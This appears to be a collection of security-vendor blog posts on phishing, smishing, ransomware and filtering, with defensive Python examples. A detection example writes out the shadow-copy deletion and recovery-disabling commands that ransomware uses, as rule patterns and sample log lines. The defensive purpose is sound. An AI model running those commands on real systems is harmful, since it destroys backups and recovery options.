Both types of phishing campaigns are damaging to corporate reputation and patient data privacy, which is why healthcare providers and other organizations should take several steps to protect users from being phishing targets. Users don’t have the training necessary to identify phishing campaigns, but even IT administrators fall victim to these attacks. The best way to protect users is to stop malicious messages from reaching targeted recipient inboxes. This can be done using email filters.
The best way to prevent phishing attacks on your email servers is to configure a robust and constantly update cybersecurity solution. Email filters using artificial intelligence (AI) are the best way to discover dangerous emails. They can be quarantined prior to landing in the intended recipient’s inbox. The quarantined emails can still be monitored by system administrators for review and, should they find that a message has been incorrectly quarantined, they can forward the emails to the intended recipients.
Additionally, attachments and files are often leveraged to fool email recipients into downloading ransomware on the network. This tactic is typically used to deploy ransomware, another dangerous attack style that targets data privacy and integrity. Threat actors often use it to target on healthcare providers knowing that it can bring business workflows and productivity to a stand still. Cybersecurity systems can track and review attachments to see if they hold macros used to install ransomware and place it on corporate systems.
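The macro check the paragraph refers to can be done on the attachment itself before it is delivered, because modern Office files are zip containers whose parts are named. The inspector below is an added example written for this page (not SpamTitan's or any vendor's scanning engine): it builds two constructed Office Open XML attachments in memory, reports whether a VBA project part is present, and treats a macro inside a `.docx` (which should never carry one; macro-enabled documents use `.docm`) as a stronger signal than a macro inside a `.docm`. Legacy OLE2 files (`.doc`, `.xls`) are a different container, so they are only recognized by their magic bytes and routed for deeper parsing; the part names, content type string and quarantine rules are the example's own assumptions.

```python
import io
import zipfile

MACRO_PART_NAMES = {"vbaproject.bin", "vbadata.xml"}          # VBA project parts inside OOXML
MACRO_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"   # declared in [Content_Types].xml
NON_MACRO_EXTENSIONS = {"docx", "xlsx", "pptx"}                # formats that should never hold VBA
OLE2_MAGIC = b"\xd0\xcf\x11\xe0"


def build_ooxml(parts):
    """Constructed Office Open XML container for the demo: a zip holding the given parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


CONTENT_TYPES_CLEAN = (
    b'<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    b'<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument'
    b'.wordprocessingml.document.main+xml"/></Types>')
CONTENT_TYPES_MACRO = CONTENT_TYPES_CLEAN.replace(
    b"</Types>",
    b'<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/></Types>')

# Two constructed attachments: one ordinary document, one carrying a (placeholder) VBA project.
CLEAN_DOCUMENT = build_ooxml({"[Content_Types].xml": CONTENT_TYPES_CLEAN,
                              "word/document.xml": b"<w:document/>"})
MACRO_DOCUMENT = build_ooxml({"[Content_Types].xml": CONTENT_TYPES_MACRO,
                              "word/document.xml": b"<w:document/>",
                              "word/vbaProject.bin": OLE2_MAGIC + b" placeholder VBA project"})


def inspect_office_attachment(filename, data):
    """Describe macro indicators in an attachment. Verdicts:
    clean, has-macros, macro-in-non-macro-extension, needs-ole-parser, corrupt-container, not-office."""
    ext = filename.rsplit(".", 1)[-1].lower()
    result = {"filename": filename, "format": None, "macro_parts": [], "verdict": "clean"}
    if data[:4] == OLE2_MAGIC:
        # Legacy binary format: VBA lives in OLE storages, which needs a dedicated parser.
        result.update(format="ole2", verdict="needs-ole-parser")
        return result
    if data[:2] != b"PK":
        result.update(format="unknown", verdict="not-office")
        return result
    result["format"] = "ooxml"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            result["macro_parts"] = [n for n in names
                                     if n.lower().rsplit("/", 1)[-1] in MACRO_PART_NAMES]
            declared = zf.read("[Content_Types].xml") if "[Content_Types].xml" in names else b""
    except zipfile.BadZipFile:
        result["verdict"] = "corrupt-container"
        return result
    if MACRO_CONTENT_TYPE in declared and not result["macro_parts"]:
        result["macro_parts"].append("<declared in [Content_Types].xml only>")
    if result["macro_parts"]:
        result["verdict"] = ("macro-in-non-macro-extension" if ext in NON_MACRO_EXTENSIONS
                             else "has-macros")
    return result


def quarantine_decision(result):
    """Map an inspection result to the filter action: deliver, hold for review, or quarantine."""
    if result["verdict"] in ("clean", "not-office"):
        return "deliver"
    if result["verdict"] == "needs-ole-parser":
        return "hold-for-review"
    return "quarantine"


if __name__ == "__main__":
    for name, blob in [("invoice.docx", CLEAN_DOCUMENT), ("invoice.docx", MACRO_DOCUMENT),
                       ("invoice.docm", MACRO_DOCUMENT), ("old-invoice.doc", OLE2_MAGIC + b"\0" * 28)]:
        r = inspect_office_attachment(name, blob)
        print(name, r["verdict"], r["macro_parts"], "->", quarantine_decision(r))
```

The "hold for review" path is the one the quarantine paragraph above describes: the message is kept out of the inbox while an administrator, or a second engine that understands the legacy container, decides whether it was wrongly held.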
Your organization should aim to put in place multi-layered cybersecurity to safeguard its systems and data. Without a layered approach, a healthcare provider could become part of the next large data breach. Implementing a strong email filter together with the right web content filter allows your organization to mitigate the dangers posed by human error: the email filter spots malicious messages, quarantines them and lets administrators double-check them before release.
The widespread use of Chromebooks in educational institutions worldwide has put the devices in the hands of up to 40 million users in this sector.
While these devices help close the equity, technology and homework gaps that many school districts need to address, they also raise cybersecurity questions that have to be answered. A Chromebook is, in the end, only a tool that should be used in the proper manner. The main reason the devices are supplied in an educational setting is to provide access to something online, usually an educational application or a game app.
Enforcing boundaries is crucial for young users: they stop students from staying connected to game sites and from reaching harmful or malicious content. Along with this there is the issue of CIPA compliance for K-12 institutions that depend on E-rate funding. CIPA requires school districts to implement an internet safety policy that blocks or filters images and content classified as harmful to minors. Effective filtering controls are therefore a requirement for school districts that deploy Chromebooks at any scale.
Chromebooks require the same security as other computing devices, as they are susceptible to malicious code. Even though traditional .exe files cannot run on a Chromebook, Android malware and other dangers are an active threat, and the internet is the main attack vector for malware and other malicious campaigns. Next-generation DNS blocking is an important part of any multi-layered cybersecurity strategy and should be built into every educational filtering solution.
WebTitan on-the-go for Chromebooks offers the same user- and device-level web filtering that Windows administrators already use for their Windows 10 devices, delivered specifically for Chromebooks. The WebTitan Cloud management interface is web-based, intuitive and easy to use.
WebTitan is designed for the “Anywhere Workforce” as well as “Anywhere Learning.” Whether students are using their devices on campus in a traditional classroom or remotely, they and their devices are protected by the same granular internet filtering policies. The cloud-based solution gives internal IT the ability to manage the web filtering system fully from anywhere in the world.
Admins therefore have the same tools and interface regardless of where they are based. For onboarding, rather than relying on on-premises equipment or client software, WebTitan simply redirects your devices’ DNS queries to its cloud resolvers. Because there is no inline device, intranet traffic and non-HTTP/HTTPS traffic are not affected. The trade-off is that a DNS filter only sees name lookups: a device configured to use a different resolver, or one that connects directly to an IP address, bypasses it, which is why the Chromebooks themselves should be locked down so the DNS setting cannot be changed.
When it comes down to it, there is probably no institution more difficult to configure web filters for than K-12. WebTitan on-the-go for Chromebooks was created to work in the most complex of environments using a simple three-step process:
- Set up your desired groups
- Configure granular filtering policies that block the content categories you choose
- Assign those policies to your groups
You can also override your policies with manually created exceptions.
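To make the three steps and the exception rule concrete, here is an added example of the decision a DNS-based filter makes at resolution time. It is not WebTitan’s code; the category feed, groups, policies and domain names are all constructed, and the precedence rules (threat categories always blocked, then manual exceptions, then category policy) are an assumption about how such a filter should behave, not a description of the product. Category matching walks up the name so that a subdomain inherits its parent’s category.

```python
"""Added example: group policy, category lookup and exception override for a DNS filter."""
from dataclasses import dataclass, field

# Constructed category feed: registered domain -> category. A real filter uses a
# large vendor-maintained feed, but matches it the same way: on the query name
# and on each parent domain, so that www.games.example inherits games.example.
CATEGORY_FEED = {
    "games.example": "games",
    "video.example": "streaming",
    "phish.example": "phishing",
    "wiki.example": "education",
}
THREAT_CATEGORIES = {"phishing"}   # never allow-listable, even by a manual exception


@dataclass
class Policy:
    blocked_categories: set
    allow_exceptions: set = field(default_factory=set)   # always allowed despite category
    block_exceptions: set = field(default_factory=set)   # always blocked despite category


def domain_labels(qname: str):
    """Yield the query name and each parent domain: a.b.c -> a.b.c, b.c, c."""
    parts = qname.lower().rstrip(".").split(".")
    for i in range(len(parts)):
        yield ".".join(parts[i:])


def lookup_category(qname: str) -> str:
    for candidate in domain_labels(qname):
        if candidate in CATEGORY_FEED:
            return CATEGORY_FEED[candidate]
    return "uncategorized"


def decide(qname: str, policy: Policy) -> tuple:
    """Return (verdict, reason). Threat categories win, then exceptions, then the
    group's category policy; an exception on games.example also covers its subdomains."""
    category = lookup_category(qname)
    labels = list(domain_labels(qname))
    if category in THREAT_CATEGORIES:
        return "block", f"threat:{category}"
    if any(d in policy.block_exceptions for d in labels):
        return "block", "exception"
    if any(d in policy.allow_exceptions for d in labels):
        return "allow", "exception"
    if category in policy.blocked_categories:
        return "block", f"category:{category}"
    return "allow", f"category:{category}"


# Steps 1 and 3: the groups and the policy assigned to each (constructed).
GROUP_POLICIES = {
    "students": Policy(blocked_categories={"games", "streaming"},
                       allow_exceptions={"edu.video.example"}),
    "staff": Policy(blocked_categories=set(),
                    block_exceptions={"games.example"}),
}


def resolve_for_user(group: str, qname: str) -> tuple:
    """The per-query decision for a device that belongs to the given group."""
    return decide(qname, GROUP_POLICIES[group])


if __name__ == "__main__":
    for group, q in [("students", "www.games.example"), ("students", "edu.video.example"),
                     ("staff", "www.games.example"), ("staff", "login.phish.example")]:
        print(group, q, resolve_for_user(group, q))
```

The point of the ordering is that an allow exception created for a teacher’s video site must not be able to unblock a phishing domain that happens to share a parent, which is why the threat check runs before exceptions are consulted.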
WebTitan’s reporting feature allows relevant information about a student’s internet history to be queried and summarized in an easy-to-read report. Administrators and IT personnel can also identify broad behavior patterns in student internet usage at the system and group level.
Another reassuring feature is WebTitan’s malicious URL detection service, which searches for threats in real time with AI-assisted protection against newly registered phishing URLs and even zero-minute attacks.
The first quarter of 2021 has seen the surge in ransomware attacks on companies continue. Most victims were targeted when they had insufficient security measures in place to resist the attack, leaving both their systems and their valuable data exposed.
In most cases a range of well-known measures would have prevented the attack from succeeding. Below are the standard measures that will bolster your security posture.
Measures that can fight ransomware attacks on your business
There are several ransomware mitigations that can be implemented to reduce the risk of ransomware attacks and limit the severity of an attack should a network be compromised.
- Limit access to network resources: Apply the principle of least privilege, tightly restrict administrative access, and restrict who can download and run software.
- Configure a strong spam filter: A strong spam filter stops phishing emails and email-delivered malware from reaching users’ inboxes.
- Use a web filter to review network traffic: A web filter lets your systems spot and block attempts to reach malicious websites and known-malicious IP addresses.
- Set up multi-factor authentication: Login credentials stolen in phishing attacks are how many ransomware actors get into networks. Multi-factor authentication means a stolen password on its own is not enough to log in, and acts as an additional safeguard when a credential is compromised.
- Limit or block Remote Desktop Protocol (RDP): Consider whether RDP is necessary and disable it wherever possible. Where it must stay, restrict the originating sources that may connect and require multi-factor authentication as above.
- Provide end-user security awareness training: Make sure employees know how to spot phishing emails, follow cybersecurity best practices and avoid risky online activity.
- Invest in the best available AV software: An advanced anti-virus solution that regularly scans all IT assets for malware reduces the chance that an infection goes unnoticed.
- Apply patches promptly and update software regularly: This is crucial to prevent the exploitation of known vulnerabilities. The majority of vulnerabilities exploited in attacks are months old, with patches available that were never applied.
- Turn off macro scripts in Office files: Disable Office macros on all devices unless there is a business need to allow them. Open Office files received by email in viewer software rather than the full Office application.
- Block connections from known Cobalt Strike servers: Block traffic to and from known Cobalt Strike infrastructure and restrict the use of other post-exploitation tools where possible.
- Add application allowlisting: Only allow programs to run where your security policy permits. Prevent execution from locations that ransomware commonly writes to, such as temporary folders and the LocalAppData folder.
- Put in place network segmentation: This limits the harm that can be done to different parts of your network should an attacker get inside it.
- Block inbound connections from anonymization services: Deny access from Tor exit nodes and other anonymization services to IP addresses and ports where external connections are not expected or required.
- Create a robust backup policy: Ensure backups of critical data are taken regularly and tested to confirm files can actually be restored. Keep a copy offline or otherwise out of reach of an attacker on the network, since ransomware operators look for connected backups and encrypt or delete them.
Arrests have been made in the United Kingdom after a group of hackers was found to be sending large volumes of text messages to trick recipients into sharing their login details.
The Birmingham-based cybercriminals published their own website and used online advertising to reach more potential victims. When these activities were discovered, police issued warrants for the arrest of those responsible.
The group, referred to as ‘SMS Bandits’, advertised across several channels and sent text messages containing a link to a malicious website that asked visitors to share their login credentials and other sensitive data. SMS Bandits offered to hit large volumes of phone numbers with smishing messages for just $40 to $125 per week through a service they called ‘OTP Agency’.
Along with the smishing service itself, SMS Bandits offered “bulletproof hosting,” meaning the phishing site could not easily be taken down through standard legal channels. In most cases these attacks end when the site is reported and the host disables it. The smishing attacks could be tailored, allowing specific targeting of small businesses, large businesses and individuals.
Organizations need to be conscious of the threat posed by smishing and train staff accordingly. Attackers use smishing to open an attack and steal credentials, intellectual property or private corporate information that could damage an organization’s reputation.
Email filters are excellent at stopping messages from spoofed senders and malicious message content, but text messages do not normally pass through anything comparable. The best tactic against smishing is therefore to educate staff to spot it. The content is typically similar to a phishing email: offers of discounts or money in exchange for clicking a link and entering private data. If that data is corporate data, it goes straight to the cybercriminals.
One of the main characteristics of a smishing attack is the use of short links, which deny the reader any view of the site behind the URL. A short link should be the first warning sign, the promise of money or discounts the second. The two together are a strong sign that the message is malicious and should be deleted.
Companies need to train staff to recognise these signs of a smishing attack. The importance of never handing credentials to a third party, or entering them into a form on a linked website, needs to be emphasised.
Using a solution such as that offered by multi-award-winning TitanHQ adds a security suite renowned for advanced email security, DNS filtering and secure email archiving. Make the first move and get in touch with the team at TitanHQ today.
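The two indicators above can be turned into a simple triage rule for incoming SMS, for example on a corporate mobile-device management gateway. The following is an added example rather than any vendor’s code: it extracts link hosts, matches them against a small list of URL shorteners, looks for money or discount lures and for credential requests, and only calls a message malicious when a short link is combined with one of the lures, so that a legitimate shortened newsletter link is flagged for review rather than deleted. The shortener list, lure words and sample messages are assumptions constructed for the example, not a complete ruleset.

```python
"""Added example: score SMS text for the smishing indicators named in the text."""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"(?:https?://|www\.)[^\s<>]+", re.IGNORECASE)
SHORTENER_DOMAINS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "cutt.ly", "rb.gy"}
# Money/discount lure, or a currency amount
LURE_RE = re.compile(r"\b(refund|prize|won|winner|discount|voucher|reward|cash)\b|[$£€]\d+",
                     re.IGNORECASE)
# A request to enter or confirm credentials
CREDENTIAL_RE = re.compile(r"\b(verify|confirm|log ?in|password|account suspended|otp|one[- ]time)\b",
                           re.IGNORECASE)


def extract_hosts(text: str):
    """Yield the lower-cased host of every URL in the message."""
    for m in URL_RE.finditer(text):
        raw = m.group(0)
        if not raw.lower().startswith("http"):
            raw = "http://" + raw          # bare www. links have no scheme for urlparse
        yield (urlparse(raw).hostname or "").lower()


def is_shortener(host: str) -> bool:
    """Match the shortener domain itself or a subdomain of it, never a lookalike suffix."""
    return any(host == d or host.endswith("." + d) for d in SHORTENER_DOMAINS)


def score_sms(text: str) -> dict:
    """Return the indicator flags and a verdict of 'malicious', 'suspicious' or 'clean'."""
    hosts = list(extract_hosts(text))
    short = any(is_shortener(h) for h in hosts)
    lure = bool(LURE_RE.search(text))
    creds = bool(CREDENTIAL_RE.search(text))
    if short and (lure or creds):
        verdict = "malicious"       # both signs together, as the text recommends
    elif short or lure or creds:
        verdict = "suspicious"      # one sign alone: hold for review, do not auto-delete
    else:
        verdict = "clean"
    return {"hosts": hosts, "short_link": short, "lure": lure,
            "credential_ask": creds, "verdict": verdict}


# Constructed sample messages
SAMPLES = [
    "You have won a $500 voucher! Claim at https://bit.ly/3xAbCd before midnight",
    "Your parcel is waiting, confirm your details: http://cutt.ly/pkg-9921",
    "Reminder: your dentist appointment is tomorrow at 10am.",
    "Read our latest newsletter: https://bit.ly/news-issue-4",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(score_sms(s)["verdict"], "|", s)
```

The credential-request pattern is included because the SMS Bandits lure was “share your login details”, not always money; the text’s two indicators are the minimum, not the whole picture.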
TitanHQ has released WebTitan Cloud 4.16 which adds new functionality to the DNS-based web filtering solution to make management even easier. The latest release also includes a new school web filtering solution.
WebTitan Cloud 4.16 includes DNS Proxy 2.06, which allows filtering of users in Azure Active Directory as well as on-premises Active Directory, with directory integration that makes managing filtering controls for users, groups of users and the whole organization even easier. The release also includes several fixes and security enhancements to better protect users from web-based threats.
TitanHQ is pleased to announce the release of WebTitan OTG (on-the-go) for Chromebooks with the latest version of WebTitan Cloud. This new service has been specifically developed for the education sector to ensure students can access the Internet safely and securely.
The use of Chromebooks has been growing, with the devices popular in schools as they are a cost-effective way of giving students Internet access. While the Internet offers many learning opportunities, it is important to protect students from threats and web content that could cause them harm.
Schools should implement controls to restrict access to inappropriate content as well as block threats such as phishing, malware, and ransomware. WebTitan OTG for Chromebooks makes that a very quick and simple process.
WebTitan OTG (on-the-go) for Chromebooks allows IT professionals in the education sector to apply web filtering controls for individuals, school years, all students, and separate controls for staff members. From start to finish, set up takes just a few minutes.
Administrators have precision control over the content that can be accessed, allowing them to easily comply with state and federal laws, including the Children’s Internet Protection Act (CIPA).
WebTitan OTG for Chromebooks is a DNS-based web filter that makes its decision at name resolution, before any content is downloaded. It therefore adds no noticeable latency, regardless of where the Internet is accessed: in the classroom, at home or elsewhere.
No hardware is required, there are no proxies or VPNs, and administrators have full visibility into Internet access, including locations, web pages visited, and attempts made to visit restricted content.
Key Features of WebTitan OTG for Chromebooks
- Cost effective web filtering for schools.
- Easy to install and manage remotely.
- Full reporting across Chromebook users and locations.
- User level policies.
- No additional on-premises hardware required.
- No slow & expensive VPNs or Proxies required.
- Chromebooks can be locked down to avoid circumvention.
- Fast, customizable & accurate DNS filtering.
Using WebTitan OTG for Chromebooks provides an effective way to apply filtering policies to your Chromebooks from the cloud.
“This new release comes after an expansive first quarter. The launch of WebTitan Cloud 4.16 brings phenomenal new security features to our customers,” said TitanHQ CEO Ronan Kavanagh. “After experiencing significant growth in 2020, TitanHQ expects these product enhancements and new features to make 2021 another record-breaking year.”
2021 has so far seen a massive rise in new strains of ransomware being used to infiltrate the networks of enterprise organizations.
This represents a shift in the tactics of cybercriminals, who spent most of 2020 trying to take advantage of workers forced into unsecured home-working environments by the COVID-19 pandemic. In the opening months of 2021 there has been a clear surge in the number of attacks concentrating on employees who are slowly returning to large office settings.
One such strain is Babuk. Victims whose data has been encrypted receive a demand for a $60k-$85k ransom in exchange for the private key needed to decrypt it. Babuk works like a typical ransomware campaign but includes a number of characteristics designed specifically with companies in mind as targets.
Babuk disables several of the backup and recovery features available in Windows. The first to go is the Volume Shadow Copy Service (VSS), which keeps snapshots of files in use; with shadow copies gone, users cannot roll files back to an earlier version. It also disables the file-locking mechanisms that protect open and active files so that they can be encrypted, and it turns off the backup features used by Microsoft Office.
Babuk then moves on to encrypting files. Files smaller than 41MB are double-encrypted, while larger files are split into chunks before encryption. The cipher is ChaCha8, with keys derived from a SHA-256 hash, a cryptographically secure hash function. Unlike commodity ransomware, Babuk uses a single private key per victim, as it is focused on enterprise targets.
There are a few ways to prepare for Babuk. Encrypting particularly important files yourself protects their confidentiality if they are stolen, but it does not stop ransomware from encrypting them again, so it is not a defence against the ransom itself. What does work is a cloud or offline backup that is not reachable from the compromised network, so that data can be restored without paying.
Monitoring software will flag suspicious activity on the network and can interrupt malware before it finishes encrypting files or exfiltrating data; system administrators are alerted and can review the activity to gauge the threat level. Another strong measure is an email filter that uses machine learning to spot potentially dangerous messages and attachments, which can then be quarantined and reviewed by an administrator. This greatly reduces the chance that a moment of human error leads to a malicious file being downloaded and starting the encryption process.
Training and user education also help prevent human error. Staff who know how to spot a threat can warn administrators about potential attacks and avoid running attachments on their local devices.
SpamTitan Email Security is a strong cybersecurity solution that will help bring the risk of network infiltration down to an acceptable, manageable level. Contact SpamTitan now to enquire about a free trial and see the strength and value of the solution for yourself.
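The backup-disabling step is the one moment in a ransomware run where a detection can still save the data, so here is an added example of what that detection looks like (not Babuk’s code, not a vendor’s, and not a signature for Babuk specifically, whose exact commands the text does not give). Ransomware commonly removes shadow copies and disables recovery using built-in Windows tools, so the rules match process-creation records for vssadmin, wmic, wbadmin and bcdedit with tell-tale arguments. The log lines are constructed records in a Sysmon-like key=value shape, not real telemetry.

```python
"""Added example: detect shadow-copy deletion and recovery tampering in process-creation logs."""
import re

# Each rule: (name, process image basename, regex over the command line)
VSS_RULES = [
    ("shadow_copy_delete_vssadmin", "vssadmin.exe", re.compile(r"delete\s+shadows", re.I)),
    ("shadow_storage_resize", "vssadmin.exe", re.compile(r"resize\s+shadowstorage.*maxsize", re.I)),
    ("shadow_copy_delete_wmic", "wmic.exe", re.compile(r"shadowcopy\s+delete", re.I)),
    ("backup_catalog_delete", "wbadmin.exe", re.compile(r"delete\s+(catalog|systemstatebackup)", re.I)),
    ("recovery_disabled", "bcdedit.exe",
     re.compile(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures", re.I)),
]

# key=value or key="quoted value" tokens
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_record(line: str) -> dict:
    """Parse one key=value log record into a dict (quoted values may contain spaces)."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def match_rules(record: dict) -> list:
    """Names of every rule whose image and command-line pattern both match the record."""
    image = record.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    cmd = record.get("CommandLine", "")
    return [name for name, proc, rx in VSS_RULES if image == proc and rx.search(cmd)]


def detect(lines) -> list:
    """Return alerts as (host, user, rule) tuples for every matching record."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        for rule in match_rules(rec):
            alerts.append((rec.get("Host"), rec.get("User"), rule))
    return alerts


# Constructed sample log: one benign vssadmin listing, three tampering commands on
# a workstation, and a non-Windows-tool process whose arguments look similar.
SAMPLE_LOG = [
    'Host=FS01 User=CORP\\svc_backup Image="C:\\Windows\\System32\\vssadmin.exe" '
    'CommandLine="vssadmin list shadows"',
    'Host=WS17 User=CORP\\jdoe Image="C:\\Windows\\System32\\vssadmin.exe" '
    'CommandLine="vssadmin.exe delete shadows /all /quiet"',
    'Host=WS17 User=CORP\\jdoe Image="C:\\Windows\\System32\\wbem\\WMIC.exe" '
    'CommandLine="wmic shadowcopy delete"',
    'Host=WS17 User=CORP\\jdoe Image="C:\\Windows\\System32\\bcdedit.exe" '
    'CommandLine="bcdedit /set {default} recoveryenabled no"',
    'Host=WS02 User=CORP\\asmith Image="C:\\Program Files\\App\\app.exe" '
    'CommandLine="app.exe --delete shadows"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Matching on the image name as well as the arguments keeps the rule from firing on unrelated programs, and the same three commands arriving from one user on one host within seconds is the pattern worth paging on.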
A recently discovered phishing attack is imitating messages sent between parents and teachers. In the campaign, an email is spoofed to look as if it came from a student’s parent and carries an attachment containing a malicious macro. The message tells the teacher that an earlier message with a student assignment did not reach their inbox.
It appears the phishers obtained a directory of teacher email addresses from faculty contact lists published on a school website. The message looks extremely authentic because it includes the teacher’s name. Once the malicious file is opened and the macro runs, it downloads the ransomware executable.
New tactics seen in this campaign include an SMS alert to the phisher once a recipient downloads the file, and use of the Go programming language to build the malicious file. Files encrypted by the ransomware are listed in a text file named “About_Your_Files.txt” placed on the user’s desktop.
Schools are an attractive target for phishers as they typically do not have large budgets for cybersecurity. There are, however, a number of measures that schools should introduce as a minimum to prevent attacks like this from taking hold.
Email filters block ransomware attachments before they reach targeted inboxes. They spot malicious messages and files and place them in quarantine, where a system administrator can review them for false positives; if a message turns out to be legitimate it can be released to the intended recipient.
Backups come into play once files have been encrypted. They allow schools and other organizations to restore data without paying the ransom. Best practice is to store backups off-site, and cloud backups are a mainstay of the disaster recovery strategies needed after a ransomware attack. Training and user education is another security measure: cybersecurity training helps teaching staff identify the tell-tale signs of a phishing email and cut the attack off as soon as it begins.
The vast majority of schools have adopted digital means of communicating and working with students and parents. This is a very efficient way of corresponding and allowed education to continue throughout the COVID-19 lockdowns. However, it also brings new challenges for educational bodies. Cybersecurity may have been a minimal concern ten years ago, but it now needs to be tackled head on to avoid students and staff becoming victims of hackers.
One very useful tool is WebTitan on-the-go (OTG) for Chromebooks, which lets your organization safeguard all of its Chromebook users from the dangers of online use. The solution was created specifically with the education sector in mind; it supports CIPA compliance and is an inexpensive filtering solution for Chromebooks.
Schools using the WebTitan Chromebook client can simply apply policies to all of their Chromebook users by group.
A cybercriminal group has leveraged the email alerts that notify users of an available update in order to infect systems with malware.
The software update feature of the Passwordstate password manager was compromised to attack enterprise users of the product. The supply chain attack delivered malware known as Moserpass to customers who updated at various points between April 20 and April 22.
Anyone who applied an update through the In-Place Upgrade mechanism in that window could have received a malicious file named Passwordstate_upgrade.zip.
If the file was installed, it started a chain of events that activated Moserpass, which gathered system information about the device and network along with password data from the Passwordstate application. The malware also had a loader capability that could download further malware onto victims’ devices. Because passwords may have been stolen, affected customers have been warned to change all of them.
The attack was mitigated in less than 30 hours, and Click Studios, the developer of the password manager, sent customers a request to apply a hotfix to remove the malware from their systems. Unfortunately, having seen copies of that request shared on social media, the attackers sent an almost identical email as a phishing campaign, this time linking to a website they controlled. Instead of a fix that removed Moserpass, it delivered an updated version of the malware to anyone who fell for the scam.
The emails were, naturally enough, extremely convincing, and recipients who followed the instructions would have believed they were removing malware when they were actually installing it. The fake versions do not use the domain suffix that Click Studios uses, ask for the hotfix to be installed from a subdomain, and claim an ‘urgent’ update is needed to fix a bug, but it is easy to see how these messages could trick end users.
Click Studios provides password management services to approximately 29,000 companies, and the solution has hundreds of thousands of users, many of whom will have heard of the breach and be worried about infection. Click Studios said only a very small number of customers were affected and had the malware installed, those who downloaded the update in the 28-hour window between April 20 and April 22, but anyone receiving the fake email could well have been convinced it was genuine and run the download as directed.
It is a common tactic for cybercriminals to leverage fake security warnings, and data breach notifications are ideal material for phishing. This Passwordstate breach notification phishing campaign shows how crucial it is to double-check every message for signs of phishing even when the content appears authentic and carries the right logos, and it shows the danger of posting copies of genuine breach notification letters on social media.
Many phishing attacks are sophisticated, and it can be tricky for recipients to tell the genuine from the malicious. This is why your organization needs an advanced spam and phishing security solution. For the best defenses against phishing, contact TitanHQ now and see how SpamTitan Email Security can enhance your security and keep your organization safe from phishing and other email-based attacks.
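The tells listed above (wrong domain suffix, hotfix served from an unrelated subdomain, “urgent” wording) can be checked mechanically before anyone acts on a vendor notification, and the archive itself should be checked against a hash obtained out of band. The following is an added example and not Click Studios’ code, their notification or their real domain: the vendor domain is a placeholder, the messages are constructed, and the “pinned” hash is simply computed from a constructed archive to stand in for a value an administrator would have taken from the vendor’s website or support channel. The registered-domain helper assumes two-label domains; real code needs the public-suffix list.

```python
"""Added example: verify a vendor security notice and a downloaded update before installing."""
import hashlib
import hmac
import re
from email.utils import parseaddr
from urllib.parse import urlparse

VENDOR_DOMAIN = "clickstudios.example"      # assumption: placeholder for the vendor's registered domain
URL_RE = re.compile(r"https?://[^\s<>]+", re.I)


def registered_domain(host: str) -> str:
    """Last two labels of a host name (enough for the .example names used here)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def check_notification(from_header: str, body: str) -> dict:
    """Flag sender and link domains that are not the vendor's; 'trusted' only if all pass.
    A subdomain of the vendor domain (www.vendor) is fine; vendor.other-domain is not."""
    _, addr = parseaddr(from_header)
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    sender_ok = sender_domain == VENDOR_DOMAIN
    links = [urlparse(u).hostname or "" for u in URL_RE.findall(body)]
    bad_links = [h for h in links if registered_domain(h) != VENDOR_DOMAIN]
    return {
        "sender_ok": sender_ok,
        "links": links,
        "bad_links": bad_links,
        "urgent_wording": bool(re.search(r"\burgent\b", body, re.I)),
        "trusted": sender_ok and not bad_links,
    }


def verify_archive(data: bytes, pinned_sha256: str) -> bool:
    """Compare the archive's SHA-256 with the out-of-band value (constant-time compare)."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), pinned_sha256.lower())


# Constructed messages: a genuine-looking notice and a lookalike
GENUINE = ("support@clickstudios.example",
           "A hotfix is available at https://www.clickstudios.example/hotfix/Passwordstate_upgrade.zip")
FAKE = ("support@clickstudios-support.example",
        "URGENT: apply the fix now from https://clickstudios.update-portal.example/Passwordstate_upgrade.zip")

# Constructed archive bytes and the hash an admin would have pinned from the vendor site
GOOD_ARCHIVE = b"PK\x03\x04constructed-upgrade-archive"
PINNED = hashlib.sha256(GOOD_ARCHIVE).hexdigest()
TAMPERED_ARCHIVE = GOOD_ARCHIVE + b"\x00loader-stub"

if __name__ == "__main__":
    print("genuine:", check_notification(*GENUINE))
    print("fake:   ", check_notification(*FAKE))
    print("good archive ok:", verify_archive(GOOD_ARCHIVE, PINNED))
    print("tampered archive ok:", verify_archive(TAMPERED_ARCHIVE, PINNED))
```

The hash check is the one that would also have caught the original poisoned Passwordstate_upgrade.zip, since a compromised update channel serves a perfectly genuine-looking email.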
The popularity of the Telegram messaging platform has grown sharply in recent years, helped by a large migration of WhatsApp users following changes to that service’s privacy and data management policies.
Telegram is also widely used by hackers to run malware campaigns. A recently discovered campaign distributes a new malware strain called ToxicEye, a Remote Access Trojan (RAT) that gives attackers complete control of an infected device. The malware is used to exfiltrate sensitive data and download further malware.
ToxicEye uses Telegram as its command-and-control channel. Through the attacker’s Telegram account, an infected device can be controlled to steal data and receive further malicious payloads.
Telegram is a popular messaging service with over 63 million downloads and approximately 500 million active users globally. In particular, there has been massive growth since the beginning of the COVID-19 pandemic, with the app adopted by many businesses to let remote workers communicate and collaborate. The app supports secure, private messaging, and most companies allow Telegram and do not block or audit its communications.
Creating a Telegram account is simple and attackers can hide their identity: all that is needed is a mobile phone number, and the communication infrastructure lets attackers steal data and send files to infected devices unnoticed.
